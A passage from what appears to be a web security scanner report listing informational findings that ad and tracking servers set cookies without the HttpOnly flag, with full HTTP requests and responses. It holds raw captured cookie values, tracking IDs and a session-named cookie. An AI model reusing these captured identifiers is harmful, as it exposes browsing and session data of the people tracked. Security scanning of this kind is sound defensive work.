3C0g+hDTgcn2mNvmM3NKx69VBxkjkOZxx6XZSBxHuDhwFRo0mFMBl0fKMGrF9xGVp42oFAH1EEod/28MSymYNvCbsfK4npaI+P8SK2x4V96vPHuTLDy/Cx6vHAh+vGlGwUBCANBff9nrluERrS+3Fyfx+Ui+p8hfo8cX2P+ETONPEfu+uP1+RCcG/400DyLJkt2SPTwT9pApTDqP6SZyya0LZzhosQBzN0pTIbzDXEeGOqYZP9VfGtLlYN69+lf/n0KwunQtrPfAR1dQ8puRIko3TButILht14pfWmofo5W0T3geacseWomgQLjLT3uFWX/HXp+K3yYMD+s1qh/O5fZ21itvVvyjurOJNHwPCBFNddUGGdHNUGO1T1Kyo42ZT/kMjgqiVSPrh+V27aJE522u9E5Uuvj48++J9zk0HAF4MP8pbMoeaq1U3zJHDdejn5X/BXm+thzK+Rj0hfGndyks5pZb2IvqvIrRO+Jh9lMW0WRh3MqKF/QUxLA0DV9lTInWhVKKDHCLf9B+Vr8d64IvjJ1SaxZM731RZxyn8HrvU6mZZo5hMLOYr95YzEFr9ZgdqU00kw90WgDPabslCoBnR8vLiP2BaVC7rX6eFBOv1ASiKQM9hdr0/ut12g3n8MYbIDtI7ghXyI31mAtBtWKqCrPU/eor48rAdH+FDHc8bvtoW73rj1Tpdq4/+oeY7fdYQjg3DsXB1bJFC2aHnkmzrR3l28WWFHb9D/32f+BBQA; rsiPus_wuF1="MLsXrqMOJjhroJB0OsFGPziNFPNiun2gwhaoALt97xKhGoM8aleSaGIyXRDs4FkB8sFCZuw+T+165hyVBVJdSmUgvaZFUEgQ++TCUEHmPCzXDcHU3/q71ALbK2PSrJN+jB0Gcwa4UhPEVrUN6TcHwqPWgepSOQrGAM308YkJ9Kue16ot0nIp6qAd3oiL1vu8ImerbnCX9fr9JwgYkrBhGapemCFDjspZk1rtEaWVVb/SLwdVTkAbzsNzSnzwc5wGCa8jVcpLL1HEVmqAjL5TwOMK3qCqjZRxHhcVoCO32Vm2a4+oGoVsu6f5cdmr702F+fO8bJ0zUZTlrWdNQF76rVKVigm4I2aRP1upzq3Xa844B3rJfxR7kbIeqiNcOFqKbSbO0FyTBJmabs/5OGsVm8MzaWv8XDRsNoP6aqXleVpyBBYMCmndtzdvmN0PX2PGTSEgHhHEOXIef+hyFlWIYJXhKyB1GZ1nN2HxLnlweSc/bw47BG+TDLVioZi40WnLGVk5Z4CwWDF0HwdzaazFGEJnNpjYIdAXTH/lTD8va6y4gx9mPASTJgNc22xlesGWI7OxZl1lqQ7HaLFB1HNYBtc5bP7IeCvhsYBGZg7cviKgAqSA9rxV77UbSt7TCcEyrrWjO+3NEalTV9bExjEijsonVl1qiCkFcvi4aTfn0Xp29/bqHk9TGMy+VTExoryi89XrlvZChiv8aCqD5nn1swwyeI8WXt6PokJinNDm627rLE7xLD9GZAmT4EC6DnSNF66FJKT8gRriX0keP+ld6zjtUeyx5jDTsazJK/T22dm7i42KiJZZ+f3mfdl1R07uyRQ6zBPxN70+SfMEN0VDs+0K+P2dhEnHBFEMNjU7Q45KqoSl8BK7apDExjVxjQh+dsxHVzgaFZsZaqXyOVXEIOp8oSNlzyOlBEIL/wfuQMfqNOFtMORF41x2ag+MOqOOgTOdugSJ08l6FYGH5XPnZQcM6Qwefavxgc9IzEXOoF0bdiHi8Phz+D5O/sUnh+KES8fiVsIqDkgN/d4VXR+Bqtve+rF1K2Zq3A=="; rsi_us_1000000="pUMlIz9DOAYU1O2uA3Nf1wgg9Tpn7P+LBAm++DA1mQ19Ktk0xHsNbUdnssfo0Gg2GtNOjezP3rQsX+ieC4o2fHI9QkQeov8FSjRptD7ENVbUid4nnMJw2upjcbtYuTDvN446ehF3GgXLLZTbonI4jYrOBasvRFfMnkE53wY4Qa+hKdx6gukgA/85R9jXhtGV7/piYr5YQZgjMiKl8zWjUoD0F3UhqKyr9Id97BfRNHCeDUiGyQYV3IR679d+6Fpy0gp1Hq2XjxlJKDOqjAs1Uw1dudiAIQw7rizeuLD3XUC+e/mDTPH7BnVmGnFlHpoxfT7YsL0wt1TCMgGvoSIbnMIU57JYoUftomTxWnNTVj2NzOwDjpZIg48YPTnIgihnfbJxlqTqbhkTFxz+dV3nEMImFBKzd64qvE1zt38WPal3ooNbYqY4hIZWj8N4pKHLwHPyWzs/CsI6rWRhrWMPRaUafMfQn/v0U75IJgD8TGuloOwC16CAbvKgsBHdSES2thl/yLffPkkgsVchivYvx1DIgzI+Hp2cwp15/JafWYD1uqtnSaqyiY5cSyX1S9pZYVMWf8I99X0PmkHmiE+AmJ2pOIUjqqv8lHsXuUlO5LZo1crEog7F/asoNmA7+b1HAp4GyFPw8IccpCRD55tkYzvfpalmWhSIak/31maiBYBGTGdMPAhhPIWehJXnhsO0s79zhTvo+mhSTEb31vIjsG19H8uhSlb70Xz/RdUHnSSFQu2fn9OoA0ULdTsbgEYRNxte1+V4Vu5pclZS/SluGYRGqFciUTHH7jlTzS7r4Od1PDbqHOXOoGhgdQKRwlGytvhlJ3xpN38TeBBvuSli78zJal5w2RgiXvdzsle4GypMSBJTlBFpkLcvXbok3eHAtIL39rfw/UIu83ImxrDg6smRtaoCYqy6FrPvEOZvbHeZKJ1G6PoYEXV8RC7c5ut/7o1FJqaAV9fv+dLKW/LayYdfhFv6v33uPJSN5cTsetqde/n2tODUxKQxVKARJrsoIbuTvqK0rkezL0LMNB5mMi30PtNyanRSr/WUuwQZpJ60S6tI3fUgKWeajoXdlSIz4FFghQ9I+YJhmXQ9IxhQqDK+BwrtqJ+G/7aCwcyCBYmRkfHJc/Flc9ttNYB8QLSGHHxZcNV7DJc5sT00OUsUVmrKDXWc+nRcX1WiQ/VkP0PS/bC1/DbhNecPWVRE0AXkOh/IOoVf06+8SOgC8Ev3jO0RbucQa8aazOvezkk7zeyQCkyl2Mc4X9xCgxUsXK9DtZSCJK6m2R/mQCTbaItUg3/6EIcy8zL2Scsdi6aQPsU9UrkfVegfH0Uty3GkCV77GW5oseV6DHz9+RNhUmepmjvJu5cKj0grDAv9MP790ikGiL9Vbfl+2hPsPfIsGhjWXsvCaPLDLnnlLu7s6jCtbDAg+6/AWwustsHfWZNO9mP2B2hNB72eXivVKC3ScCpTMJq/yXGNl7gyrzILPyfzvctlhE7tAAL1KCRqQVBYdg=="
If-Modified-Since: Mon, 02 May 2011 20:22:43 GMT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLvv9SEJaSpn5l5JKLO/s2zMplZx83H/TTC237PZPP4jKiBCFJaY5cZka6FAtm4beqRWw/7FAzLkWXPgIi8VcsaW5MDVtyvwUNDmfjnsZinmZmXPA2Xh4s3kYnwTAk95HpSVCJHpmM4f/oSj749Ef0YoEddWzhx0AIyJfNmub+lo3hCs8LnYwhKiCV9cxtsduDxbgKGig/xdEapIXSBKNatGNERzsnj+UNGdAHjvZtk857qAFI/JHp6anpYCWza055lSd/MLrRwSO48cnRouEsdtYk0zIftzb4efvXkFMCdtxKYjYztIAlrXjdirsdz57gxvCx+1yhN6nRBa64pN4S7uJitpEBm8dQSAyNDhHsGsJrNkCJ6ZxlEFDFsmCK0svzKYoQdP0S6423I9WAaEIx7VNodCRuTRBkeZ+XoWsZAth6Wn2VB1yhKUy7TTiQdZNlq/oSoNvFin7QOKtwsLHS9KAG49pJzF1zGo9QMgH87vcuf0MBW3G1uzFmAnzhns2ko4vHbUWexJEzgmNSLWyE+lNuPVpV7NG0ZP21fZls7cB+zhzBIR0A4vTymhUJFNDbvZLFJ0o2EneEwSVC97z152JrWrbEoJIqN4LiE/kfxgqrEfAm4BtWxi9g+lPpPL1U4pv3QxsQQA8bzanIEAyROb1yf1vsHwkssVmYY+3jrig+V236VnjX2k9ouoIDbjDp/WY3Y9uozUmChz+zRhYuN6g3ADifa6eZMXP8bjtRV1B3cptMvwccSdg17f1pWL0bC2MTo2ErViU+pVctOxMQAX9plYHFyRApfdiF1SlRYrNpzZWCdqNaMSNSSlLIL3fuVqv/f7u73RFXDKULQmNSMrd1AVabiZA6OOyU/6bu85OJZqr/C2F/OvpuK5tkLNi90yZ+WJbAGQMUaIjMrV6iOZuI20ZaOS911V4fiL8G8OzG9ZlCWx6zlHhlLQfp28njBTFI0iVbCusNtZfgjV/u/iSefKfyukOzZNRr7xmBLPUMvameG/FqAaZVCsJgFcypU9TDn+r7xiiqWUJ1jWHFMKCRAKVu1ChD0Od5sq8yBqCUkxNY0bXY4czRVwBjvWG9X+O5+cOsWxMGhVddhPq4WawXVbRElO5vLKUQHXwhmSfhgZT+8stt8pSsaESu9rAbSc7LZurZ+HAxsgb1IbVaMzNxs1M2gZJdi46mkSC0Z7NNdB9jr7k2rUccIXsJbMfiyckH2iDQKWc4xECU/e8H8HfcHHw7vrTtoOQqqfdD6OmvM=; Domain=.revsci.net; Expires=Tue, 08-May-2012 13:59:31 GMT; Path=/
Last-Modified: Mon, 09 May 2011 13:59:31 GMT
Cache-Control: max-age=3600, private
Expires: Mon, 09 May 2011 14:59:31 GMT
X-Proc-ms: 2
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:30 GMT
Content-Length: 5035

//Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC)
var rsi_now= new Date();
var rsi_csid= 'B08725';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){
...[SNIP]...
10.75. http://latent.alvenda.net/Latent.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://latent.alvenda.net
Path:   /Latent.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Latent.html?cn=impression_5lnsx9b4_RubiconRemarketing_ThomsonReuters&cv=%2C%2Ctr1%2Calvendathomsonreuters%2Cwww.thevine.com.au%2Chttp%3A//alvenda-tags.s3.amazonaws.com%2Crubicon HTTP/1.1
Host: latent.alvenda.net
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:01 GMT
Content-Type: text/html
P3P: CP="NON DSP TAIa PSAa PSDa IVAa IVDa OUR IND UNI"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: impression_5lnsx9b4_RubiconRemarketing_ThomsonReuters=_,,tr1,alvendathomsonreuters,www.thevine.com.au,http://alvenda-tags.s3.amazonaws.com,rubicon;Version=1;Path=/;Max-Age=2592000
Content-Length: 0
Server: Jetty(6.1.22)

10.76. http://leadback.advertising.com/adcedge/lb  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&betr=tc=1,99999,51134,50086,50085,53380,60490,60512,50963,52615,60491,50507,53656,55401,60509,57094,50961,52841,51182,56419,54032,51186,56988,56673,56148,57362,56969,60203,56835,56987,56780,50220,56768,56299,56761,54057,56681&guidm=1:16r4opq1tvlkml&bnum=23230 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; F1=B8ziF3kAAAAAgCsCAEAAgEABAAAABAAAAMAAgEA; BASE=Rgwq9yEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2unWu4QL44U5Tp5J7h57WACK9DFolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpUSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3eAQ44q0qPrQrsF+Mlvp1J!; ROLL=boAnq2C+ORAgHEGte/mz/DHyJN5VpuB!; C2=MzzxN5pqDIxFGMnovQg3sYAGSK8BItdRzdQ3WX0cHsY4FN3Bw3gRzdQ7NY0cHoLOGN3BKGeRzdwmhX0cH8eDGN3BdDmRzdwohX0cHQY4FN3BYimRzdA3Wa0cHoa4FN3BA9qRzdgdeZ0cH4fFGN3BbTeRzdwKOa0cHoN5FN3BC9qRzdwtZa0cHE0rGN3BFBqRzdQTaa0cHY4dGN3BNLqRzVrqEoxsGgRtrSQIza8QRGABg2chsZm5Ia4SxOCBsRpRE1I9IsfzFOxi4SQBwWQdltCqGyHseSw7Ra0gVSPBrLqB1NJUEQT2FNIruTQAzZ0g0KHBbzqRDm6BE8sXGNIogVwrgYICzWdBkoqBXN67FcNNG8YkAbwuRX4dumvBEOpBlOLUGsEpGALq+bQoeZktfOsBgwhxdX7/HUJtGuTZpTrhzFqFH09IGGXo8ew5qY0cY6wBsMixQdAnjaMUHEv9FDVqGdQ9fZ0/FirZDughLFLJI8GlGAH; GUID=MTMwNDkwMjg2MDsxOjE2cjRvcHExdHZsa21sOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 13:59:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=bN/xN5pqDIxFGxkovMg3sYU8SKMCItdBwhQ3WXAcIsY4FAHCw3gBwhQ7NYAcIoLOGAHCKGeBwhwmhXAcI8eDGAHCdDmBwhwohXAcIQY4FAHCYimBwhA3WaAcIoa4FAHCA9qBwhgdeZAcI4fFGAHCbTeBwhwKOaAcIoN5FAHCC9qBwhwtZaAcIE0rGAHCFBqBwhQTaaAcIY4dGAHCNLqBwVrqDoxsGFftrSQIzaQHRGABg2cxFZm5IaMJxOCBsRphd0I9HsfzFz+i4SQBwWkTltCqGXFseSw7RaIXVSPBrLqRONJUEQT2FyFruTQAzZIX0KHBbzqhcl6BE8sXGyFogRwrgYc4zWdBkoqRwM67FcNNGhWkAbwuRXMUumvBEOpR+NLUGsEpGlIq+bQoeZ4jfOsBgwhB3W7/HUJtGTRZpTrxMFqFH09IGrUo8ew5qYITY6wBsMiBqcAnjagKHEv9FoSqGdQ9fZI2FirZDugxkELJI8GlGlE; domain=advertising.com; expires=Wed, 08-May-2013 13:59:55 GMT; path=/
Set-Cookie: GUID=MTMwNDk0OTU5NTsxOjE2cjRvcHExdHZsa21sOjM2NQ; domain=advertising.com; expires=Wed, 08-May-2013 13:59:55 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Mon, 09 May 2011 14:59:55 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
10.77. http://media.adfrontiers.com/pq  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.adfrontiers.com
Path:   /pq

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pq?t=j&s=923&ac=5&at=1&xvk=60302672.07185271 HTTP/1.1
Host: media.adfrontiers.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tc=1; af="3|!RglRcjj3oVAzGl,hfn!gk!!77,-1066|3142|618|1|1304340985980|26|3|0:349|2477|618|1|1304340397914|26|3|0:-"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private, no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 01 Jan 2000 00:00:00 GMT
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Set-Cookie: af="3|!RglRcjj3oVAzGl,hfn!gk!!77,-1066|3142|618|1|1304340985980|26|3|0:349|2477|618|1|1304340397914|26|3|0:349|1148|1484|1|1304949605794|25|2|0:-"; Version=1; Domain=media.adfrontiers.com; Max-Age=2592000; Path=/
Content-Type: application/javascript
Content-Length: 252
Date: Mon, 09 May 2011 14:00:05 GMT
Connection: close

document.write('<iframe height=90 width =728 hspace=0 vspace=0 frameborder=0 marginheight=0 marginwidth=0 scrolling=no src="http://media.adfrontiers.com/pq?t=f&s=923&ts=1304949605791&cm=1148&ac=5&at=1
...[SNIP]...
10.78. http://newspaper.app40.ur.gcion.com/GCION.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newspaper.app40.ur.gcion.com
Path:   /GCION.ashx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /GCION.ashx?q=5&Segment=D08734_70008%7CD08734_72078&CacheDefeat=1304949583122 HTTP/1.1
Host: newspaper.app40.ur.gcion.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 13:59:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: rsi_segs=D08734_70008|D08734_72078; domain=.gcion.com; expires=Tue, 08-May-2012 13:59:45 GMT; path=/
Cache-Control: private
Content-Length: 0

10.79. http://oads.mochila.com/openx/www/delivery/ajs.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oads.mochila.com
Path:   /openx/www/delivery/ajs.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /openx/www/delivery/ajs.php?source=mochila_live&zoneid=167&mmadsize=300_140&widget=IBDtout&buyerId=OrlandoSentinel&destination=1596&cb=081922772 HTTP/1.1
Host: oads.mochila.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Cache-Control: private, max-age=0, no-cache
Content-Type: text/javascript; charset=UTF-8
P3P: CP="CUR ADM OUR NOR STA NID"
Date: Mon, 09 May 2011 13:59:37 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Set-Cookie: OAGEO=US%7C%7C%7C%7C601.5168%7C601.5195%7C%7C%7C%7C%7C; path=/
Set-Cookie: OAID=9eb743ef8885d18c9cf09de695a0ce63; expires=Tue, 08-May-2012 13:59:37 GMT; path=/
X-Powered-By: PHP/5.1.6
Content-Length: 1532

var OX_39787ffc = '';
OX_39787ffc += "<"+"script type=\"text/javascript\">\n";
OX_39787ffc += "RD = top.location.href.substr(7,top.location.href.indexOf(\'/\',7)-7);\n";
OX_39787ffc += "var _mbuyerId
...[SNIP]...
10.80. http://oads.mochila.com/www/delivery/lg.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oads.mochila.com
Path:   /www/delivery/lg.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /www/delivery/lg.php?bannerid=1051&campaignid=185&zoneid=167&source=mochila_live&loc=1&referer=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.story&cb=b547bcc71c HTTP/1.1
Host: oads.mochila.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAGEO=US%7C%7C%7C%7C601.5168%7C601.5195%7C%7C%7C%7C%7C; OAID=a390bfc358a9e03af3a7c9a7a6945d79

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Cache-Control: private, max-age=0, no-cache
Content-Type: image/gif
P3P: CP="CUR ADM OUR NOR STA NID"
Date: Mon, 09 May 2011 13:59:37 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Set-Cookie: OAID=a390bfc358a9e03af3a7c9a7a6945d79; expires=Tue, 08-May-2012 13:59:37 GMT; path=/
X-Powered-By: PHP/5.1.6
Content-Length: 43

GIF89a.............!.......,...........D..;
10.81. http://odb.outbrain.com/utils/odb  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/odb

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /utils/odb?method=get_score_rec&key=GANHREW345&url=http%3A//www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages&idx=0&num=5&srv_pc=true&max_num_ads=1&nostar=true&format=json&callback=GEL.thepage.pageinfo.outbrain.init&blog_posts=true HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; _lvs2=uaMqgoSgWEsyZpjyGwNcoBSjR24A8Yxx; _rcc2="c5YqA63GvjSl+Ov6ordflA=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; Domain=.outbrain.com; Expires=Thu, 03-May-2012 14:00:34 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Set-Cookie: _lvs2="uaMqgoSgWEsyZpjyGwNcoLoN1lBMsXDlkJWlQEP7SN0="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Mon, 04-Jun-2012 14:00:34 GMT; Path=/
Set-Cookie: _lvd2="27vfag1ZPzcjif+xs0aSMA=="; Version=1; Domain=outbrain.com; Max-Age=564480; Expires=Mon, 16-May-2011 02:48:34 GMT; Path=/
Set-Cookie: _rcc2="c5YqA63GvjSl+Ov6ordflA=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Mon, 04-Jun-2012 14:00:34 GMT; Path=/
Set-Cookie: recs="FV47GVeXROTRQDQGso7n7BJgimfU4hutZsi+REu/kRSXRrfTy1nLEJ07hVMifX9qva0UddJWrWk="; Version=1; Domain=outbrain.com; Max-Age=300; Expires=Mon, 09-May-2011 14:05:34 GMT; Path=/
Content-Type: text/x-json;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:33 GMT
Content-Length: 3991

GEL.thepage.pageinfo.outbrain.init({'response':{'exec_time':18,'status':{'id':0,'content':'Request succeeded'},'request':{'did':'204042585','req_id':'1f9a95338cac93e0d7953f1aee6ee9d4'},'score':{'prefe
...[SNIP]...
10.82. http://openx2-match.dotomi.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://openx2-match.dotomi.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: openx2-match.dotomi.com
Proxy-Connection: keep-alive
Referer: http://www.surphace.com/ads/rubicon_orlandosentinel
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 204 No Content
Date: Mon, 09 May 2011 14:00:11 GMT
X-Name: rtb-s04
Set-Cookie: Apache=173.193.214.243.1304949611489462; path=/
Cache-Control: max-age=0, no-store
Content-Type: image/gif
Content-Length: 0
Connection: close

10.83. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7856/12590/22782-15.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7856/12590/22782-15.js?cb=0.3376502951141447&keyword=music HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; put_1986=2724386019227846218; cd=false; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ruid=154dab7990adc1d6f3372c12^9^1304949670^2915161843; 